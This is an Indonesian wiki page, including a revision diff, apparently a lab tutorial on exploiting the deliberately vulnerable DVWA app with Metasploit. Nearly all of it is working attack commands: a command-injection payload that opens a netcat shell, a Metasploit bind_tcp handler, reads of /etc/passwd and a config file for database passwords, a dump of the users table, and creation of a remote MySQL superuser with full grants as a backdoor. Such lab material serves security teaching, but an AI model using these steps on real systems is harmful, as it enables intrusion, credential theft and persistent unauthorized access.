Difference between revisions of "DVWA: Exploit menggunakan Metasploit"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| Line 55: | Line 55: | ||
Cari password database | Cari password database | ||
| − | ls -l /var/www/html/ | + | ls -l /var/www/html/DVWA-1.9/config |
| − | cat /var/www/html/ | + | cat /var/www/html/DVWA-1.9/config/config.inc.php |
| − | Explorasi database | + | Explorasi database, asumsi username MySQL root, password 123456 |
| − | echo "show databases;" | mysql -uroot - | + | echo "show databases;" | mysql -uroot -p123456 |
| − | echo "use dvwa; show tables;" | mysql -uroot - | + | echo "use dvwa; show tables;" | mysql -uroot -p123456 |
| − | echo "use dvwa; desc users;" | mysql -uroot - | + | echo "use dvwa; desc users;" | mysql -uroot -p123456 |
| − | echo "select * from dvwa.users;" | mysql -uroot - | + | echo "select * from dvwa.users;" | mysql -uroot -p123456 |
Buat user baru | Buat user baru | ||
| − | echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot - | + | echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -p123456 |
| − | echo "select * from dvwa.users;" | mysql -uroot - | + | echo "select * from dvwa.users;" | mysql -uroot -p123456 |
Lihat informasi tabel MySQL | Lihat informasi tabel MySQL | ||
| − | echo "show databases;" | mysql -uroot - | + | echo "show databases;" | mysql -uroot -p123456 |
| − | echo "use mysql; show tables;" | mysql -uroot - | + | echo "use mysql; show tables;" | mysql -uroot -p123456 |
| − | + | Ini bagian paling berbahata, buat user MySQL yang baru | |
| − | echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot - | + | echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -p123456 |
| − | echo "select * from mysql.user;" | mysql -uroot - | + | echo "select * from mysql.user;" | mysql -uroot -p123456 |
==Referensi== | ==Referensi== | ||
* https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html | * https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html | ||
Revision as of 04:06, 4 May 2017
Sumber: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html
Persiapan
Masuk ke DVWA, misalnya
http://192.168.0.80/DVWA-1.9
username admin password password
Klik
DVWA Security > Security Level Low > Submit
Siapkan NetCat
Masuk ke DVWA Command Injection, lakukan
192.168.0.100;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
Dimana 192.168.0.100 adalah IP address server DVWA
Gunakan metasploit
Jalankan
msfconsole thankyou
Lakukan
use multi/handler set PAYLOAD linux/x86/shell/bind_tcp show options set RHOST 192.168.0.100 exploit
Cek password
whoami grep www-data /etc/passwd grep www-data /etc/group
Cek Password melalui konfigurasi Web
ps -eaf | grep http pwd ls -ld /var/www/html ls -ld /var/www/html/DVWA* ls -l /var/www/html/DVWA*
Cari password database
ls -l /var/www/html/DVWA-1.9/config cat /var/www/html/DVWA-1.9/config/config.inc.php
Explorasi database, asumsi username MySQL root, password 123456
echo "show databases;" | mysql -uroot -p123456 echo "use dvwa; show tables;" | mysql -uroot -p123456 echo "use dvwa; desc users;" | mysql -uroot -p123456 echo "select * from dvwa.users;" | mysql -uroot -p123456
Buat user baru
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -p123456
echo "select * from dvwa.users;" | mysql -uroot -p123456
Lihat informasi tabel MySQL
echo "show databases;" | mysql -uroot -p123456 echo "use mysql; show tables;" | mysql -uroot -p123456
Ini bagian paling berbahata, buat user MySQL yang baru
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -p123456 echo "select * from mysql.user;" | mysql -uroot -p123456